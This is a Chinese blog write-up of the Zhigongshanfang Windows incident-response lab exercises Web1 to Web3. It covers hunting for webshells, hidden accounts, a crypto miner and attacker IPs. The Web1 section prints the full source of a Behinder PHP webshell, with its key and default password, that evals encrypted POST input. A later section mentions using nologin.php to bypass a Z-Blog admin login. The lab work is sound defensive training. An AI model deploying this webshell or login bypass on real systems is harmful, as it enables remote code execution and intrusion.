当前位置:   article > 正文

知攻善防应急靶场-Windows(Web1-2-3)_知攻善防 靶场

知攻善防 靶场

知攻善防应急靶场-Web1

1.要求

2.过程

直接扫网站根目录 发现后门

  1. <?php
  2. @error_reporting(0);
  3. session_start();
  4. $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
  5. $_SESSION['k']=$key;
  6. session_write_close();
  7. $post=file_get_contents("php://input");
  8. if(!extension_loaded('openssl'))
  9. {
  10. $t="base64_"."decode";
  11. $post=$t($post."");
  12. for($i=0;$i<strlen($post);$i++) {
  13. $post[$i] = $post[$i]^$key[$i+1&15];
  14. }
  15. }
  16. else
  17. {
  18. $post=openssl_decrypt($post, "AES128", $key);
  19. }
  20. $arr=explode('|',$post);
  21. $func=$arr[0];
  22. $params=$arr[1];
  23. class C{public function __invoke($p) {eval($p."");}}
  24. @call_user_func(new C(),$params);
  25. ?>

找到shell连接密码,并进行解密,发现为默认冰蝎密码rebeyond

查看网站日志  得到攻击者IP 192.168.126.1

使用Windows日志一键分析功能 查看远程桌面登陆成功日志 发现未知用户名hack168$

在桌面处找到位置程序,运行后cpu飙升,判别为挖矿程序,进行分析 

使用pyinstxtractor进行反编译得到pyc文件

  1. https://github.com/extremecoders-re/pyinstxtractor

 

使用在线pyc反编译工具,得到源码

  1. https://toolkk.com/tools/pyc-decomplie

 

得到矿池域名wakuang.zhigongshanfang.top

提交

知攻善防应急靶场-Web2 

1.要求

2.过程

1.直接查杀网站根目录 发现system.php后门

查看日志 得到攻击者第一个IP

 查看php文件发现shell密码 hack6618

 

发现有隐藏用户 hack8887$  记得删除

终端输入regedit

 得到第二个IP 192.168.126.129

 发现文档  感觉就是伪qq

点开发现是ftp攻击 且发现为frpc内网攻击 得到攻击者服务器 IP 以及端口

 提交

知攻善防应急靶场-Web3 

1.要求

2.过程

 查询隐藏用户 发现隐藏用户hack6618$

修改 隐藏用户hack6618$ 密码进行登入系统

发现攻击者IP

  打开任务计时程序发现 .bat文件和flag1

打开system.bat 文件得到flag2 发现这是一个一句话木马

我们配置好PHPstudy登入网站发现是个 Z-Blog 进入后台发现没有密码 那我们直接下载nologin.php 就可以修改密码登入 工具网上搜就有

 登入后台 在用户管理里面发现flag3

提交

 

感谢 知攻善防实验室提供的靶机 让我学到了不少关于应急响应的知识

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小丑西瓜9/article/detail/723617
推荐阅读
相关标签
  

闽ICP备14008679号